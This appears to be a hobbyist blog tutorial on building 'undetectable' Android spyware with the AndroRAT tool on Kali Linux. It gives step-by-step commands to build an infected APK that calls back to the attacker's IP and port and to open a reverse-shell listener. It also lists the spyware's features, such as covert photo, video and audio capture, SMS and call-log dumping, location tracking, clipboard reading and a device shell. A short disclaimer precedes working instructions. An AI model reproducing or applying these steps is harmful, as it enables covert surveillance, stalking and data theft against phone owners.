How to hack an Android phone using Kali Linux
How to set up undetectable spyware on an Android phone using Kali Linux.
As I was re-watching Mr Robot, the famous realistic hacking TV show, I noticed in an episode how one of the hackers installed spyware on a phone to spy on the phone’s owner.
I wondered, now than android has evolved a lot, is it still possible to hack an android phone without being detected by antiviruses. After some research, I found some interesting results I’m about to share with you in this post. But before, as always…
Disclaimer
I remind you that it’s illegal to attack a device if you don’t have permission to do so. This demonstration is for educational purposes only. In this post, I’ll use my own phone. You shouldn’t try it on someone else.
Understand how a RAT works
First, a little theory before practice. A RAT (remote access Trojan) is malware installed on a target device (usually a phone or a pc). The malware can be installed on the target by the hacker himself, if he can physically access the device, or via an infected app the user installed. The spyware then sends signals to a particular IP. In order to receive the signal, the hacker must set up a listening shell. Then, it waits for a signal to be received. Once a signal is received from the target, the connection is established and the hacker is able to steal data from the device.
Setting up the environment
As always, I’ll use Kali Linux to create the malware and to set up my reverse shell.
For the hypervisor users
If you’re using a VM in a private network, make sure you hypervisor network settings are bridged (Connected to the physical network).
Setting a static IP
On a local network, we have to set a static IP and tell Kali not to listen to the DHCP. We need to edit the kali network file with nano
sudo nano /etc/network/interfaces
We add our settings under what’s already in the file, save (CTRL+S) and quit (CTRL+X).
auto eth0
iface eth0 inet static
address [The IP you want to give to your kali]/24
gateway [your gateway IP ]
Then, we restart the network service.
sudo systemctl restart networking.service
If you check with ip addr, it should look like this :
Setting up Python
Now, we need to install pip and colorama
sudo apt install python3-pip
Sometimes it is already installed, but just in case it isn’t :
pip install colorama
Setting up Java
Java is already installed in Kali. You just have to set your Java version to Java 8.
sudo update-alternatives --config java
Then choose the number corresponding to java 8 (here 2).
Cloning AndroRat
Clone the AndroRat Project from github
Building the infected app
Ok, now that everything is set up, let’s move into the androRat folder and start the program.
cd AndroRAT/
We can build our malware using --build, with -i to indicate our IP, -p the port which the signal will be sent to, and -o the name of the app you’re generating.
python3 androRAT.py --build -i [your_static_ip] -p [your_port] -o [your_app_name].apk
Setting up a listener shell
Once the app is generated, let’s set up the listener. I recommend to execute the shell as root to avoid permissions problems in Kali.
sudo python3 androRAT.py --shell -i [your_static_ip] -p [your_port]
From now on, Kali is waiting for connections. Any person which install the infected app on his phone will connect to us.
Installing the infected app on the target
Let’s install the malware on the target. I’m going to use my phone as the target. As you can see, the app is not detected by the default antivirus. The only shady thing is that the app requires a lot of permissions.
The reverse Shell
Back on our Kali Linux, we’re in the phone via a reverse shell the second the target opened the app. The malware is persistent, which means it will stay even if the user restarts his phone.
Now that we have access to the target, a lot of features are available :
Capture a photo / Video
Dump SMS
We can also get the call logs, vibrate the phone, record audio… and much more, here is the entire list (from https://github.com/karma9874/AndroRAT)
deviceInfo --> returns basic info of the device
camList --> returns cameraID
takepic [cameraID] --> Takes picture from camera
startVideo [cameraID] --> starts recording the video
stopVideo --> stop recording the video and return the video file
startAudio --> starts recording the audio
stopAudio --> stop recording the audio
getSMS [inbox|sent] --> returns inbox sms or sent sms in a file
getCallLogs --> returns call logs in a file
shell --> starts a sh shell of the device
vibrate [number_of_times] --> vibrate the device number of time
getLocation --> return the current location of the device
getIP --> returns the ip of the device
getSimDetails --> returns the details of all sim of the device
clear --> clears the screen
getClipData --> return the current saved text from the clipboard
getMACAddress --> returns the mac address of the device
exit --> exit the interpreter
Conclusion
I am amazed (and a bit scared too) about how simple it was to setup an undetectable RAT on an recent and updated android phone. Sure it requires to do some research and some network knowledge, but it’s far from impossible.